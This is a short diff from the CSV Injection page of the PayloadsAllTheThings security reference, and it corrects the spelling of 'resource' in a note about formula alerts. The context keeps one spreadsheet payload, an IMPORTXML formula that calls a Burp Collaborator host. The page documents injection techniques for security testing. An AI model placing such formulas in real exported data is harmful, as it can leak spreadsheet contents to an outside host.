swisskyrepo/PayloadsAllTheThings/CSV Injection/README.md

 =IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
 ```

-Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization.
+Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.

 ## References